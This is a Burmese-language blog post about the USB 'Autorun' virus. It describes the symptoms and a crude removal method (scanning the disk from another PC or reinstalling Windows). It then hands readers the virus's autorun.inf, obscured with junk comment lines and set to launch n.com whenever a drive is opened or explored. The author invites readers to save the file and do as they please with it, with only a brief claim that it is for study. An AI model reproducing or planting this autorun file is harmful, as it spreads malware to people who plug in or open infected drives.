Blogger Widgets
IP

Friday

Autorun Virus ဆိုတာပေါ့ ..

Auto run Virus တဲ့ဗျာ .. ။ တော်တော် များများ ဟိုးအရင်တည်းက ဖြစ်ဖူးကြမှာပါ ။ pen drive တွေက နေ အများဆုံးကူးစက်ပါတယ် ။ သူ့ရဲ့ လက္ခဏာ ကတော့
၁ ။ .. Folder Option မှာ open each folder in the same window လို့ပေးထားရဲ့သားနဲ့ Drive တွေကို D-click နဲ့ဖွင့်ရင် နောက် window တစ်ခုကနေပွင့်ပါတယ် ။ ( အဲဒီက တစ်ဆင့် ထပ်ဖွင့်ရင်တော့ same window ဖြစ်သွားပါတယ်)

၂ ။ .. Folder Option – View မှာ Show Hidden Files and Folders လို့ပေးပြီး Save လိုက်ပါတယ် ။ Hidden files တွေ ပေါ်မလာပါဘူး ။ Folder Option – View ကိုပြန်ကြည့် Hidden လို့ပြန်ဖြစ်နေပါတယ် ။ ပြောင်းလို့မရပါ ။  

၃ ။ .. Winrar ကို ဖွင့်ပြီး Address bar မှာ C:\\ လို့ ရေးထည့်လိုက်ပါ ။ အောက်ပါအတိုင်း autorun.inf ဆိုပြီးတွေ့ပါတယ် ။ ဖြတ်လိုက်ပါတယ် ။ မရပါဘူး ခဏလေးနေပြီး ပြန်ပေါ်လာပါတယ် ။ တစ်ခြား drive တွေအားလုံးမှာလဲ အဲဒီဖိုင် အဲဒီအတိုင်းပဲ ရှိနေပါလိမ့်မယ် ။ အကောင်းဆုံးဆိုတဲ့ KAV , KIS တွေနဲ့ ဗိုင်းရပ် စစ်တော့ ပေါ်ပါတယ်။ Delete နဲ့ သတ်လိုက်ပါတယ် ။ ပျတ်မသွားပါဘူး … ။

ကျနော် ရှင်းလို့ ရတဲ့နည်းကတော့ Hard disk ကို ဖြုတ်သွားပြီး ၊ တစ်ခြားစက်မှာ Secondary အနေနဲ့သွားတပ်လိုက်ပါ ။ ပြီးရင် Virus Scan စစ်လိုက် ။ ပေါ်လာလိမ့်မယ် တဂစ်ဂစ်နဲ့ ။ 100% Complete ဖြစ်ပြီးလို့ Virus Detected 0 ဆိုရင်ပြန်စမ်းကြည့်လိုက်ပါ။ ( အကောင်းဆုံးက window ပြန်တင်လိုက်ပါ ) အဲဒါနဲ့ အဆင်ပြေသွားပါလိမ့်မယ် ။ ကျနော် Anti-Virus အလုပ် လုပ်လား မလုပ်လားစစ်ဖို့ ဒီမှာ ရေးထားပြီးဖြစ်ပါတယ် ။  
ကဲ ရှင်းလို့ပြီးပြီ .. အဲဒီ ဗိုင်းရပ်ကို လိုချင်ကြမယ်ထင်တယ် ။ အောက်က CODE တွေကို ကူးပြီး Notepad မှာထည့် file name မှာ autorun.inf လို့ပေးပြီး save လိုက်ပါ ။ ကျန်တာတော့ ဘယ်လုပ်မယ် ဘာဖြစ်မယ်တော့ မိမိသဘောပေါ့ ။

;1Kj0aDKwn4LLKLidrsqZqAkIaLKf43iKaDOK8d8iJsor571eKdl0wo27L1
[AutoRun]
;e9L33SLkrokHI8isdlwKF0Lla253dr4sqekD5siilkecj0dw13e8ZKX39wsS3wfaqk7wio1ia
open=n.com
;irllr3rr3jiDia3lw4s52q
shell\open\Command=n.com
;w22swS
shell\open\Default=1
;qKOwXa397Soksk44ai5KjqmkeSIiiasl1ULj0f4iJr43Lsw2fA53FDkrekLdr4LlD1l4jHp2ooi21lkKCoisaiDs0dww42clpi0rkk0dsjfs2kw3dq56ADdsa8k2
shell\explore\Command=n.com
;549AA28likLsmq20aLis9arD53weko4Llo4ilKowi1awf3UnkSraAak23Ia3kfi3dfi00olsw4k2os344k0dwpXD


ဗိုင်းရပ်ကို ဖြန့်တာ မဟုတ်ပါဘူး ။ သိအောင် … လေ့လာလို့ရအောင်ပါ .. ။ အဆင်ပြေကြမယ်ထင်ပါတယ် .. ။ အလိုမကျလို့ သင်ပြချင်တာ ရှိရင်လည်း ပြောနိုင်ပါတယ် ။ သင်ယူ လေ့လာ ဖို့ အသင့်ရှိပါတယ်ဗျာ .. ။ အားလုံးကို ကျေးဇူးတင်ပါတယ် ။

No comments:

Post a Comment

Photobucket

Jailbreak Wizard

Error: Embedded data could not be displayed.

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Best Web Host